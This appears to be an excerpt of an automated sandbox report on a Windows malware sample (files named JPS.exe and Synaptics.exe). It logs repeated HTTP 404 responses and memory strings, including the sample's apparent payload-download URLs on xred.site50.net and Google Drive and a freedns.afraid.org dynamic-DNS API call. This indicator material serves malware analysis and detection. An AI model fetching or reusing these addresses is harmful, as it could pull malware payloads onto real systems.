                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5P3TtdNgmCESfsYsUZ3Usn0AU7rnQMPtkb-CTuZklLm3ZrbYWnoxOUxZf9BDXHAMPIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:40 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tpK_-y7RXQiaLrPEOxiMrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6arkfPGnYGasf2ukpJYMfO6ATQi4y9foiIMnpXv9pIK3h4OZgDzsUyCwSgS4TomXVPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:41 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-82y_PJ99CVzlFqx5Y97ijQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5jux0iU5fNHlHmzifbPL-V3MsFSwXvcCatqIIP1v1f9Ut_eFAs14giCVRqWGmXh_2RContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:41 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-5GwATmorsfyUrXLyXgICJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6LEldmyVtq1I0dZB6tvLPuK6yC_Y7ZD6XTgWdx3gT3KiFE6rbV2PQqfb3oV-IIzA5e6LP8p28Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:42 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-IslGZ1Sr9Ws93cxFlpmqRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6aJCs7LypraYTT4-ESRkuEpyqMixg-7eCxiNTRF9Kj6A46X3l6CTAlcmVd5p9rhguKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:42 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-t5zpjG22om98qdy5ZMnG0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Ey4jYJWFMZ3kTQHVfi5EqgF5cYJ8ZKhMFhtHYaS1BHxTEdMc-UtSW-HvFG4tITNP83Fh3iLIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:43 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-6vfhRP9RCUfnS6f_ms_dNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ijVgIL3hiezj_7lKE67IOlzlgLTM_UijCaFOnIxMnVz4ZahfxzPwJtKINzzzNbyQpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:44 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-vMLjO7_-RWbXTbCcD8tE6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Dty4-IaLGjwdlXiIAYppWibQFM7vQai4m69uZ3k7_TD_4wCFuJ_BJ1mhyhmP0Fgm_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:44 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-sRJjcQAbP00dM9LDOzoawg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC418X1USi24Bw7w0INA1ioDTjvJc9d__D49ZEzlcl-ewiJi4WOG6ss0wxAZTgjyWDugCpw0iP8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-eYKfmEPJlh6HOX7era-ueQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6i05ZmoSTcfdBDubAg_ZLwyrl3uQP93IheTvSsGiO9PcKO0GIgCv68TVF8RzQQaAXfCL-IkJ0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:45 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-kJB-Bp7LAYnITYsJE7t17A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7AhhjpIL1Bq8HwZ7Hj_f8FmM_qaYZx-sWoEo9UUtDn_9o-K5Zkk5P6h7F7YrZ8dJMzZYGHB5EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:46 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-OP74qrCDO80YX0KNG1IzYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5OQzorC_VRjjX91Eqr639HPJt6Ex0xcQM8dCajVRyhvtaykcIp1lRcHxj7-p5OqkCDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-6WdV3s622MRrNsEv6h-DZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7sJu-SL0N5mzEfzGbZXJbejdKpavIyM1v9v6QTaSeygv_ktc1Y-Pz3ggFkoxrcXd6vContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:47 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xXB9wz8cNx2a8xNRmRL6KQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5pQD3No1ypbTfx7PvASXBqIbdAH8d5K0uu7YQQQ2LHk8OKa2Ul4vKBWW4m4fpNUX15q4T5EJQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:48 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5bylDbVJyegCWBl8Fetrhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Xtnm1YVCBj1g6Lk_Trfvx1Bsit2YY-n8hnozM9gK6ZXBYGAyJLtHlxkJeXKgP2i3-8isZXcsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:48 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-JkAS7PjkOkv0bfdkwH9hyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: Synaptics.exe, 00000003.00000003.1404566857.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404479772.00000000052E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/
                              Source: RCX5246.tmp.0.dr String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000050A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978:I
                              Source: ._cache_JPS.exe, 00000002.00000002.2559043843.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-score.com/checkip/
                              Source: RCX5246.tmp.0.dr String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
                              Source: RCX5246.tmp.0.dr String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH)
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: RCX5246.tmp.0.dr String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: RCX5246.tmp.0.dr String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1822891646.000000000B1BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1830949340.000000000EEFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1849236992.0000000015B7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1854832505.00000000184BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1839585311.0000000010FBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1837599377.000000000F7FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1840683340.0000000011BBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1839154577.0000000010ABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1850178570.000000001657E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1810857547.00000000059AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1822466449.000000000AB7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1827657847.000000000CFBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1855158439.000000001887E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1845555575.00000000149FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1829132840.000000000DFFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1826252695.000000000C5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1852458217.000000001747E000.00000004.00000010.00020000.00000000.sdmp, 
Synaptics.exe, 00000003.00000002.1806781758.00000000045AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1841983891.0000000012ABE000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c2
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.e;
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.nf
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/2
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/SQ
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/_
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/n
